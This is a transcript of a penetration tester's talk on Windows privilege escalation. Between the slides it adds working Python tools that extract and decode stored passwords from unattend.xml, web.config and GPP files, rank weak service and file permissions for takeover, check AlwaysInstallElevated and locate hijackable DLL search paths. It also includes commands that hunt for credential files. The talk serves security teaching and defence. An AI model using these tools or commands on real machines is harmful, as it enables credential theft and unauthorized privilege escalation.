Level Up! - Practical Windows Privilege Escalation
TRANSCRIPT
![Page 1: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/1.jpg)
Practical Windows Privilege Escalation
Andrew Smith
Page 2
C:\>type disclaimer.txt
• The opinions expressed in this presentation are mine and not those of my employer.
Page 3
C:\>whoami /all
•Andrew Smith
•@jakx_
•Penetration Tester
•OWASP
•Metasploit
•CTF
•Certs
Page 4
C:\>whois you
Page 5
What are you talking about?
• Relevant Windows security info (access control, integrity levels, UAC)
• PrivEsc tricks on Windows 7
• Limited user -> Local Admin
Page 6
Why should I care?
•You wanna level up
•You wanna prevent level up
•Hack the planet!
•You like Mario?
Page 7
Why should I care?
• "People designing defenses who have never had them evaluated by a good attacker is kind of like learning one of those martial arts that look more like dancing than fighting. They look nice, but when you get into a fight your dance kungfu isn't going to help you not get your ass kicked."
-Dan Guido
Page 8
Windows Access Control
*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557%28v=vs.85%29.aspx
• Securable Objects (anything that carries a security descriptor), e.g.:
• Files
• Directories
• Services
• Registry Keys
• Named Pipes
Page 9
Windows Access Control
*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379563%28v=vs.85%29.aspx
• Security Descriptor: owner, group, DACL (and a SACL for auditing)
• Discretionary Access Control List (DACL): ordered list of ACEs. No DACL at all (NULL) means everyone gets full access; an empty DACL means nobody does
• Access Control Entries (ACE): each one allows or denies an access mask to one SID. ACEs are evaluated in list order, so a deny placed after an allow never fires
Page 10
Windows Access Control
*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379563%28v=vs.85%29.aspx
• Access Token
• Container of the user's security info
• User SID, group SIDs, privileges (and, since Vista, the integrity level)
• Tied to a process or thread; every open of a securable object is checked by comparing the token against the object's DACL
Page 11-14
Windows Access Control (diagram built up over four slides)
Access Token
DACL
AccessChk
Page 15
Mandatory Integrity Control
*https://msdn.microsoft.com/en-us/library/bb625963.aspx
• Security feature since Windows Vista
• Assigns an integrity level to every process (through its token) and a mandatory label to objects
• Indicates "trustworthiness": a lower-integrity process cannot write to a higher-integrity object (no-write-up), whatever the DACL says
Page 16
Windows Integrity Levels
*Windows® Internals: Including Windows Server 2008 and Windows Vista, Fifth Edition
Page 17-18
Windows Integrity Levels
*https://msdn.microsoft.com/en-us/library/bb625963.aspx
Low -> Medium -> High -> SYSTEM
UAC sits between Medium and High: an admin's default token runs at Medium, and getting the unfiltered High-integrity token means a consent prompt. Just ask nicely…
Page 19
The Setup…
• Land on a workstation as SKYNET\Luigi via $method
• Want to escalate privileges
• Limited User -> Local Admin
• Marketing isn't Admin… right?
Page 20
Time to Level Up!
• Admin somewhere else?
• Creds in files
• Exploit unpatched EoP bugs
• Exploit insecure configs/apps
• Weak service DACLs
• Weak file DACLs
• AlwaysInstallElevated
• DLL hijacking
Page 21
Somewhere Else?
• Luigi is in the "Domain Users" group
• One box has "Domain Users" in its local "Administrators" group
Page 22
Somewhere Else?
• PowerView
• https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
• Find-LocalAdminAccess (enumerates domain hosts and reports the ones where the current user has local admin)
Page 23
Somewhere Else?
Page 24
Creds in Files
• C:\users\luigi\Desktop\passwords.xls
• C:\>dir /b /s web.config
• C:\>dir /b /s unattend.xml
• C:\>dir /b /s sysprep.inf
• C:\>dir /b /s sysprep.xml
• C:\>dir /b /s *pass*
• GPP (Group Policy Preferences: the cpassword attribute is AES-encrypted with a key Microsoft published)
• \\mushroomkingdom\SYSVOL\????
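The dir searches above only find the files; the next step is pulling the secrets out. The following is an added example, not from the talk: it walks a tree for the same filename patterns (plus the GPP XML files that carry cpassword), decodes unattend.xml passwords (base64 of UTF-16LE password with the element name appended when PlainText is false), greps password= pairs out of web.config style files, and reports cpassword ciphertext. Every file demo() writes is constructed; the GPP ciphertext is a placeholder and is not decrypted here because that needs an AES library.

```python
"""Added example, not from the slides: walk a tree for the credential-bearing
files the slide lists and pull secrets out of the formats worth parsing.
Every file written by demo() is constructed for this example."""
import base64
import fnmatch
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Filename patterns from the slide (the dir /b /s searches), matched case-insensitively.
PATTERNS = ["web.config", "unattend.xml", "sysprep.inf", "sysprep.xml", "*pass*"]
# Group Policy Preferences XML files that may carry a cpassword attribute (found under SYSVOL).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml", "datasources.xml", "drives.xml", "printers.xml"}
# Loose "password=..." in .config/.inf/.ini style files (connection strings, [GuiUnattended] etc.).
KV_PASSWORD = re.compile(r'(?i)\b(?:admin)?password\s*=\s*"?([^";\r\n]+)')


def find_candidates(root: str) -> list:
    """Paths under root whose name matches a pattern or is a GPP file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            low = name.lower()
            if low in GPP_FILES or any(fnmatch.fnmatchcase(low, p) for p in PATTERNS):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]  # strip the urn:schemas-microsoft-com:unattend namespace


def unattend_passwords(xml_text: str) -> list:
    """(element, password) pairs from unattend.xml/sysprep.xml. With <PlainText>false</PlainText>
    the value is base64 of UTF-16LE(password + element name), so undo both."""
    out = []
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if not name.endswith("Password"):
            continue
        children = {_local(c.tag): (c.text or "").strip() for c in el}
        if "Value" not in children:
            continue
        value = children["Value"]
        if children.get("PlainText", "").lower() == "false":
            value = base64.b64decode(value).decode("utf-16-le")
            if value.endswith(name):
                value = value[: -len(name)]
        out.append((name, value))
    return out


def extract_secrets(path: str) -> list:
    name = os.path.basename(path).lower()
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    if name in GPP_FILES:
        # cpassword is AES-256-CBC under the key Microsoft published; decrypting needs an AES
        # library, so only the ciphertext is reported (MS14-025 stopped new ones being written).
        return [("cpassword", v) for v in re.findall(r'cpassword="([^"]*)"', text)]
    if name in ("unattend.xml", "sysprep.xml"):
        try:
            return unattend_passwords(text)
        except ET.ParseError:
            return []
    return [("password", v.strip()) for v in KV_PASSWORD.findall(text)]


def demo() -> dict:
    """Build a constructed tree that mimics the slide's hits; return {relative path: secrets}."""
    root = tempfile.mkdtemp()
    autologon = base64.b64encode("Koopa2015Password".encode("utf-16-le")).decode()
    files = {
        "Windows/Panther/unattend.xml": (
            '<unattend xmlns="urn:schemas-microsoft-com:unattend"><settings><component>'
            f"<AutoLogon><Password><Value>{autologon}</Value><PlainText>false</PlainText></Password>"
            "<Username>Administrator</Username></AutoLogon></component></settings></unattend>"),
        "inetpub/app/web.config": (
            '<configuration><connectionStrings><add name="db" connectionString="Server=sql;'
            'User Id=mario;Password=ItsaMe!1;" /></connectionStrings></configuration>'),
        "SYSVOL/domain/Policies/{guid}/Machine/Preferences/Groups/Groups.xml": (
            '<Groups><User name="backup"><Properties cpassword="CONSTRUCTEDciphertext==" /></User></Groups>'),
        "Users/luigi/Desktop/passwords.xls": "binary blob, no parser",
        "Users/luigi/notes.txt": "nothing to see",
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return {os.path.relpath(p, root).replace(os.sep, "/"): extract_secrets(p) for p in find_candidates(root)}


if __name__ == "__main__":
    for path, secrets in demo().items():
        print(path, secrets or "(candidate, nothing parsed)")
```

On a real box point find_candidates() at C:\ (and at the SYSVOL share for the GPP files) instead of the constructed tree; files the parser does not understand, like the .xls, are still listed so they can be opened by hand.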
Page 25
Windows EoP Buggzz
• Enumerate missing patches
• post/windows/gather/enum_patches
• post/multi/recon/local_exploit_suggester (runs each local exploit module's check against the session; a KB missing from the hotfix list is a hint, not proof, since later updates supersede earlier ones)
• Pwn
Page 26
Windows EoP Buggzz
• MS13-053
Page 27
Weak Service Permissions
Accesschk.exe -qwcu "Authenticated Users" *
Accesschk.exe -qwcu "Users" *
Accesschk.exe -qwcu "Everyone" *
(-q no banner, -w only objects the account can write to, -c treat names as services, -u suppress errors; add -v to list the specific rights granted)
Page 28
Weak Service Permissions
• Can we edit the service config? (SERVICE_CHANGE_CONFIG lets us point the binary path at our own file; WRITE_DAC lets us grant ourselves that right)
• Can we edit the binary it points to?
Page 29
Weak Service Permissions
•Demo
Page 30
Weak File Permissions
• Look for writeable files
• Autoruns?
• Scheduled Tasks?
Accesschk.exe -qwsu "Authenticated Users" c:\
Accesschk.exe -qwsu "Users" c:\
Accesschk.exe -qwsu "Everyone" c:\
(-s recurses; expect noise from the user's own profile, the hits that matter are binaries and scripts that a service, scheduled task or higher-privileged user executes)
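Both sweeps (services on page 27, files on page 30) produce the same accesschk layout, and the raw list is long. The following is an added example, not from the talk, that parses accesschk output run with -v and ranks each hit by what it is good for: a service with SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS, WRITE_DAC or WRITE_OWNER can be repointed at our binary, a service with only START/STOP is just a restart primitive, and a writable file matters mostly when it is executable. The two samples are constructed to look like accesschk's format; no host was scanned.

```python
"""Added example, not from the slides: parse `accesschk -qwv ...` output (the
service and file sweeps on the previous slides, run with -v so the individual
rights are listed) and rank what each hit is actually good for. The two output
samples are constructed to look like accesschk's format; no real host was scanned."""
import re

OBJ_LINE = re.compile(r"^(RW|R|W)\s+(.+?)\s*$")   # e.g. "RW MarioUpdater" / "RW C:\path\file.exe"
RIGHT_LINE = re.compile(r"^\s+([A-Z_]+)\s*$")     # e.g. "        SERVICE_CHANGE_CONFIG"

# Rights that let you repoint or take over a service outright.
SERVICE_TAKEOVER = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER"}
SERVICE_RESTART = {"SERVICE_ALL_ACCESS", "SERVICE_START", "SERVICE_STOP"}
# Rights that let you replace or append to a file's contents (or rewrite its DACL).
FILE_WRITE = {"FILE_ALL_ACCESS", "FILE_WRITE_DATA", "FILE_APPEND_DATA", "GENERIC_WRITE",
              "WRITE_DAC", "WRITE_OWNER", "DELETE"}
EXEC_EXT = {"exe", "dll", "com", "bat", "cmd", "ps1", "vbs", "msi"}


def parse_accesschk(output: str) -> dict:
    """{object name: {"flag": "RW"|"W"|"R", "rights": [...]}} in output order.
    Without -v there are no indented lines and "rights" stays empty."""
    objects, current = {}, None
    for line in output.splitlines():
        if not line.strip():
            continue
        m = OBJ_LINE.match(line)
        if m and not line[0].isspace():
            current = m.group(2)
            objects[current] = {"flag": m.group(1), "rights": []}
            continue
        m = RIGHT_LINE.match(line)
        if m and current is not None:
            objects[current]["rights"].append(m.group(1))
    return objects


def triage_services(objects: dict) -> list:
    """(service, severity, why). Weak service DACL = change the config to run our binary."""
    findings = []
    for name, info in objects.items():
        rights = set(info["rights"])
        if rights & SERVICE_TAKEOVER or (not rights and info["flag"] == "RW"):
            why = "can change config (binPath) to our binary; runs as the service account"
            if rights and not rights & SERVICE_RESTART:
                why += "; no START/STOP right, so it needs a reboot or someone else restarting it"
            findings.append((name, "HIGH", why))
        elif rights & SERVICE_RESTART:
            findings.append((name, "LOW", "start/stop only; matters if its binary is writable"))
    return findings


def triage_files(objects: dict) -> list:
    """(path, severity, why). Weak file DACL = replace something a privileged user/service runs."""
    findings = []
    for path, info in objects.items():
        rights = set(info["rights"])
        writable = info["flag"] in ("W", "RW") and (not rights or bool(rights & FILE_WRITE))
        if not writable:
            continue
        fname = path.rsplit("\\", 1)[-1]
        ext = fname.rsplit(".", 1)[-1].lower() if "." in fname else ""
        if ext in EXEC_EXT:
            findings.append((path, "HIGH", "backdoor it; runs with the rights of whoever launches it (service, task, autorun)"))
        else:
            findings.append((path, "INFO", "writable data; check whether a privileged process reads it"))
    return findings


# Constructed samples in accesschk -v layout.
SERVICES_SAMPLE = """RW MarioUpdater
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
RW LegacyAgent
        SERVICE_ALL_ACCESS
RW KoopaTelemetry
        SERVICE_QUERY_STATUS
        SERVICE_START
        SERVICE_STOP
"""
FILES_SAMPLE = r"""RW C:\Program Files\Mushroom\app.exe
        FILE_ALL_ACCESS
RW C:\ProgramData\Koopa\settings.ini
        FILE_WRITE_DATA
        FILE_APPEND_DATA
W  C:\Program Files\Mushroom\updater.log
        FILE_APPEND_DATA
"""

if __name__ == "__main__":
    for f in triage_services(parse_accesschk(SERVICES_SAMPLE)) + triage_files(parse_accesschk(FILES_SAMPLE)):
        print(*f)
```

For a HIGH service hit the remaining questions are the ones on page 28: what account the service runs as (sc qc) and whether you hold START/STOP or have to wait for a reboot.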
Page 31-33
Weak File Permissions
• Story time
• Main app binary writeable by "Users"
• Autorun on login
Page 34
Weak File Permissions
Page 35
Weak File Permissions
• "Nah bro, UAC"
Page 36-38
Weak File Permissions
• Admin logs in
• Backdoored binary auto-executes
• Code execution at medium IL as admin (UAC filtered token)
Page 39
Weak File Permissions
• "One important thing to know is that UAC is not a security boundary."
*https://blogs.msdn.microsoft.com/e7/2009/02/05/update-on-uac/
Page 40
AlwaysInstallElevated
• Group policy setting that makes installing packages (.msi) convenient…
• ..Any .msi…
• ..for everyone..
• Windows Installer runs the package as SYSTEM, so a limited user installs whatever the .msi carries
Page 41
AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
(both values must be REG_DWORD 0x1; if either is missing or 0, Windows Installer does not elevate)
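An added example, not from the talk, that turns the two reg query commands above into a yes/no answer: it parses reg.exe's output for the REG_DWORD value, treats the "unable to find" error as absent, and only reports the setting as usable when both HKLM and HKCU are 1. The sample outputs are constructed in reg.exe's format; query_live() runs the real commands only when the script is on Windows.

```python
"""Added example, not from the slides: parse the output of the two reg query
commands above and decide whether AlwaysInstallElevated is actually usable.
The sample outputs are constructed in reg.exe's format; query_live() runs the
real commands only on Windows."""
import re
import subprocess
import sys

INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_LINE = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)")


def parse_reg_query(output: str):
    """DWORD value from `reg query <key> /v AlwaysInstallElevated`, or None when the
    key/value is absent (reg.exe prints an ERROR line and exits 1 in that case)."""
    m = VALUE_LINE.search(output)
    return int(m.group(1), 16) if m else None


def always_install_elevated(hklm_output: str, hkcu_output: str) -> bool:
    """Windows Installer elevates an MSI only when BOTH hives set the value to 1:
    HKLM comes from machine policy, HKCU from user policy, and a missing or 0
    value in either one switches the behaviour off."""
    return parse_reg_query(hklm_output) == 1 and parse_reg_query(hkcu_output) == 1


def query_live():
    """On a Windows host, run reg.exe for both hives and evaluate; None elsewhere."""
    if sys.platform != "win32":
        return None
    outputs = []
    for hive in ("HKLM", "HKCU"):
        proc = subprocess.run(["reg", "query", hive + "\\" + INSTALLER_KEY, "/v", "AlwaysInstallElevated"],
                              capture_output=True, text=True)
        outputs.append(proc.stdout + proc.stderr)
    return always_install_elevated(*outputs)


# Constructed reg.exe outputs.
HKLM_SET = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
HKCU_SET = HKLM_SET.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
HKCU_ZERO = HKCU_SET.replace("0x1", "0x0")
MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"

if __name__ == "__main__":
    print("both set  ->", always_install_elevated(HKLM_SET, HKCU_SET))    # True
    print("HKCU zero ->", always_install_elevated(HKLM_SET, HKCU_ZERO))   # False
    print("HKCU gone ->", always_install_elevated(HKLM_SET, MISSING))     # False
    live = query_live()
    if live is not None:
        print("this host ->", live)
```

When the answer is True, any .msi installed with msiexec /i runs as SYSTEM, which is what the demo on the next slide relies on; when it is False there is nothing to exploit here even if one of the two keys looks promising.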
Page 42
AlwaysInstallElevated
•Demo
Page 43
DLL Hijacking
• Windows can dynamically load DLLs
• If no full path is given, Windows walks the DLL search order and loads the first file with that name it finds
• Eg.
• LoadLibrary("ohnoes.dll")
vs
• LoadLibrary("c:\program files\ohnoes.dll")
Page 44-45
DLL Hijacking
1. The directory from which the application loaded. (Exploitable only when it is writable, see weak file DACLs)
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory. (Exploitable)
6. The directories listed in the PATH environment variable. (Exploitable)
*https://msdn.microsoft.com/en-us/library/windows/desktop/ms682586%28v=vs.85%29.aspx
(This is the order with SafeDllSearchMode enabled, the default since XP SP2; with it disabled the current directory moves up to position 2.)
Page 46
DLL Hijacking
• Privileged app loads missing DLL + controllable search path element = pwned
• Use Sysinternals Procmon
• Include: Path ends with ".dll"
• Include: Result is "NAME NOT FOUND"
• Include: Path contains a folder you can write to
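Procmon's filtered view still has to be read in search order, because the loader stops at the first directory that has the file. The following is an added example, not from the talk: it takes a Procmon CSV export (File > Save after the three filters above), groups the CreateFile probes per process and DLL name in capture order, and reports every NAME NOT FOUND probe that lands in a directory we can write and that comes before the probe that succeeded. The CSV rows, the list of writable directories (in practice from accesschk -wdq on each search-path entry) and the list of privileged processes are all constructed for the example.

```python
"""Added example, not from the slides: triage a Procmon CSV export (File > Save,
after filtering on .dll and NAME NOT FOUND as on the slide) and report the
missing DLLs a privileged process would pick up from a directory we can write.
The CSV rows, the writable-directory list and the privileged-process list are
all constructed for this example."""
import csv
import io

# Loader rule the triage relies on: the first directory holding a file with the
# right name wins, so a NAME NOT FOUND probe in a writable directory counts only
# if it comes BEFORE the probe that succeeded (or nothing succeeded at all).


def dll_probes(csv_text: str):
    """Yield (process, directory, dll name, result) for CreateFile probes of *.dll, in capture order."""
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["Path"]
        if row["Operation"] != "CreateFile" or not path.lower().endswith(".dll") or "\\" not in path:
            continue
        directory, name = path.rsplit("\\", 1)
        yield row["Process Name"], directory, name.lower(), row["Result"]


def find_hijackable(csv_text: str, writable_dirs, privileged_processes) -> list:
    """(process, dll, writable directory) for every hijack opportunity, in search order."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    sequences = {}  # (process, dll) -> [(directory, result)] in the order the loader probed
    for proc, directory, name, result in dll_probes(csv_text):
        if proc in privileged_processes:
            sequences.setdefault((proc, name), []).append((directory, result))
    findings = []
    for (proc, name), seq in sequences.items():
        for directory, result in seq:
            if result == "SUCCESS":
                break  # found here; the loader never looks further down the list
            if result == "NAME NOT FOUND" and directory.lower().rstrip("\\") in writable:
                findings.append((proc, name, directory))
    return findings


# Constructed Procmon export: MarioUpdater.exe (assumed to run as SYSTEM) walks the search
# order for ohnoes.dll (app dir, System32, System, Windows, cwd = System32 again, then PATH)
# and finally finds it in a PATH entry; version.dll resolves from System32 straight away.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:01:02.0100000","MarioUpdater.exe","1234","CreateFile","C:\Program Files\Mushroom\version.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0100100","MarioUpdater.exe","1234","CreateFile","C:\Windows\System32\version.dll","SUCCESS","Desired Access: Read Attributes"
"9:01:02.0200000","MarioUpdater.exe","1234","CreateFile","C:\Program Files\Mushroom\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0200100","MarioUpdater.exe","1234","CreateFile","C:\Windows\System32\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0200200","MarioUpdater.exe","1234","CreateFile","C:\Windows\System\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0200300","MarioUpdater.exe","1234","CreateFile","C:\Windows\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0200400","MarioUpdater.exe","1234","CreateFile","C:\Windows\System32\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0200500","MarioUpdater.exe","1234","CreateFile","C:\Python27\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0200600","MarioUpdater.exe","1234","CreateFile","C:\Tools\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.0200700","MarioUpdater.exe","1234","CreateFile","C:\Program Files\Mushroom\Tools\ohnoes.dll","SUCCESS","Desired Access: Read Attributes"
"9:01:03.0000000","notepad.exe","2222","CreateFile","C:\Python27\ohnoes.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''
# Directories a limited user can write to on the search path; constructed here.
WRITABLE_DIRS = [r"C:\Python27", r"C:\Tools", r"C:\Users\luigi"]
PRIVILEGED = {"MarioUpdater.exe"}

if __name__ == "__main__":
    for proc, dll, directory in find_hijackable(SAMPLE_CSV, WRITABLE_DIRS, PRIVILEGED):
        print(f"{proc} loads {dll} -> drop a DLL in {directory}")
```

The first finding is the one to use: a DLL dropped in C:\Python27 is found before C:\Tools, and both are found before the legitimate copy under the application's own Tools folder. The version.dll probe produces nothing because the only NAME NOT FOUND hit is in the application directory, which is not writable in this example.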
Page 47
DLL Hijacking
•Demo
Page 48
Conclusions
•Know your network/apps
•Don’t run as admin
•UAC IS NOT A SECURITY BOUNDARY
•Patch your shit
•“Hack yourself first”
Page 49
Tools
• PowerUp
• https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
• windows-privesc-check
• https://github.com/pentestmonkey/windows-privesc-check
• Sysinternals Suite
• https://technet.microsoft.com/en-us/sysinternals/bb545021.aspx
Page 50
References/Resources
https://www.insomniasec.com/downloads/publications/WindowsPrivEsc.ppt
https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
https://technet.microsoft.com/en-us/sysinternals/bb545027
http://www.greyhathacker.net/?p=738
Gray Hat Hacking, 4th edition
Windows Internals, 6th edition
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607